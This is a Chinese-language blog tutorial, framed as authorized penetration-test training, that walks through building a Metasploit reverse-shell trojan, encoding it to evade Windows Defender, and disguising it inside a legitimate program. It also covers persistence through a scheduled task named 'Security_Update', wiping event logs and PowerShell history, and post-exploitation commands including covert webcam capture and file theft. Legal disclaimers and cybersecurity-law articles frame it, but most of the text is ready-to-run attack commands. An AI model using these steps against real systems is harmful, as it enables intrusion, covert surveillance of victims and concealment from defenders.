Kali+Metasploit 木马生成、免杀与控靶机全流程(实战进阶篇)
⚠️ **严重合规声明**
本文档内容仅用于**网络安全技术学习、合法渗透测试教学及网络防御研究**。所有操作必须在**获得书面授权**的靶机或环境中进行。
**严禁**利用所学技术对未授权的目标进行攻击、入侵、数据窃取或破坏。未经授权的网络攻击行为,严重违反《中华人民共和国网络安全法》及《刑法》相关条款,必将承担相应的法律责任。
一、 实验环境准备
在进行任何实验前,请确保你的环境是**隔离且合法**的。
1. **攻击机**:Kali Linux 2025(IP:192.168.29.131)
2. **靶机**:Windows 7/10/11(建议开启快照,便于实验恢复)
3. **网络配置**:攻击机与靶机需在同一局域网,确保网络互通。
4. **工具组件**:Metasploit Framework (MSF), Apache2, Upx (可选,用于免杀研究)
二、 基础篇:生成与监听标准木马
这是最基础的渗透流程,旨在建立双向连接。
1. 生成Windows反向Shell木马
使用 msfvenom工具生成一个64位的反向连接木马文件。
# 生成64位Windows反向TCP木马
msfvenom -p windows/x64/meterpreter/reverse_tcp
lhost=192.168.29.131 # 替换为你的Kali本机IP
lport=6666 # 监听端口,建议使用1-1024之间
-f exe -o test.exe
• 参数说明:-p 指定Payload(载荷),reverse_tcp 表示靶机主动连接攻击机。
• 结果:当前目录下会生成 test.exe 文件。
2. 启动MSF监听服务
在Kali终端启动Metasploit,等待靶机上线。
# 启动MSF控制台
msfconsole
# 加载多平台监听模块
use exploit/multi/handler
# 设置Payload,必须与生成木马时一致
set Payload windows/x64/meterpreter/reverse_tcp
# 设置攻击机IP和端口
set lhost 192.168.29.131
set lport 6666
# 查看配置确认无误
show options
# 开始监听
run
此时界面会显示 [*] Started reverse TCP handler on 192.168.29.131:6666,表示监听成功。
三、 进阶篇:实战核心技术
本节为博客重点,包含免杀、持久化、痕迹清理等核心技巧。
1. 绕过杀软:基础免杀(绕过Windows Defender)
生成的原生 exe 极易被杀毒软件查杀,需进行处理。
1.1 编码混淆(Shikata-ga-nai)
使用多重编码改变特征码。
# 生成5次编码混淆的木马
msfvenom -p windows/x64/meterpreter/reverse_tcp
lhost=192.168.29.131 lport=6666
-e x86/shikata_ga_nai -i 5
-f exe -o test_encoded.exe
1.2 自制加载器(进阶思路)
将木马代码嵌入到合法正常程序(如计算器、记事本)的源码中重新编译,可有效绕过静态查杀。
(注:此部分需要C语言编译环境,示例逻辑)
#include <windows.h>
#include <shellapi.h>
int main() {
// 此处嵌入加密的木马ShellCode,运行时解密执行
// 核心原理:替换原生exe的指纹,伪装成正常软件
ShellExecuteA(NULL, "open", "notepad.exe", NULL, NULL, SW_SHOWNORMAL);
return 0;
}
2. 维持权限:持久化技术
木马运行一次容易被杀或关闭,需设置系统自启动。
2.1 Meterpreter内置脚本
在获取会话后,直接运行内置命令。
# 在Meterpreter会话中执行
# -X: 随系统开机启动 -i: 5秒检查一次上线
run persistence -X -i 5 -p 6666 -r 192.168.29.131
2.2 计划任务持久化(备用方案)
# 进入靶机CMD
shell
# 创建一个每天凌晨2点运行的计划任务
schtasks /create /tn "Security_Update" /tr "C:\Windows\System32\test.exe" /sc daily /st 02:00
3. 隐藏痕迹:日志清理
渗透结束后,必须清除日志以免被运维发现。
# 1. 清除系统日志(Meterpreter命令)
clearev
# 2. 清除命令行历史记录(靶机Shell操作)
# 删除PowerShell历史
Remove-Item $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# 删除cmd历史(通常需手动清理)
4. 稳定会话:进程迁移
如果木马进程被杀毒软件拦截,会话会断开。迁移到系统进程(如explorer)可保证稳定。
# 1. 查看当前运行进程
ps
# 2. 寻找一个稳定进程(例如 explorer.exe 的 PID)
# 假设找到 PID 为 1340
migrate 1340
四、 获取会话:常用控制命令
当靶机运行木马并成功上线后,可执行以下操作:
sysinfo # 查看系统信息
getuid # 查看当前权限(是否为System)
screenshot # 截取靶机屏幕
webcam_snap # 调用摄像头拍照
download C:\test.txt # 从靶机下载文件到Kali
upload local_file.exe C:\Windows\ # 上传文件到靶机
shell # 进入交互式CMD命令行
五、 附:中华人民共和国网络安全法(核心条款)
第三十八条 关键信息基础设施的运营者应当自行或者委托网络安全服务机构对其网络的安全性和可能存在的风险每年至少进行一次检测评估,并将检测评估情况和改进措施报送相关负责关键信息基础设施安全保护工作的部门。
第二十七条 任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具;明知他人从事前款规定的活动的,不得为其提供技术支持、广告推广、支付结算等帮助。
第六十三条 违反本法第二十七条规定,从事危害网络安全的活动,或者提供专门用于从事危害网络安全活动的程序、工具,或者为他人从事危害网络安全的活动提供技术支持、广告推广、支付结算等帮助,尚不构成犯罪的,由公安机关没收违法所得,处五日以下拘留,可以并处五万元以上五十万元以下罚款;情节较重的,处五日以上十五日以下拘留,可以并处十万元以上一百万元以下罚款。
第六十四条 网络运营者、网络产品的提供者违反本法规定,给他人造成损害的,依法承担民事责任。
第六十六条 关键信息基础设施的运营者违反本法第二十五条、第二十八条、第二十九条、第三十条、第三十一条、第三十八条、第四十一条、第四十二条、第四十三条、第四十四条、第四十五条、第四十六条、第四十七条、第四十八条、第四十九条、第五十条、第五十一条、第五十二条、第五十三条、第五十四条、第五十五条、第五十六条、第五十七条、第五十八条、第五十九条、第六十条、第六十一条、第六十二条规定的,由有关主管部门责令改正,给予警告;拒不改正或者导致危害网络安全等后果的,处一万元以上十万元以下罚款,对直接负责的主管人员处五千元以上五万元以下罚款。
💡 总结
网络安全技术是一把双刃剑。本文档旨在通过实操演示,帮助你理解漏洞产生的原理及攻击手段,从而更好地进行防御。学习技术,守好底线,合法合规是一切研究的基石。
更多推荐
所有评论(0)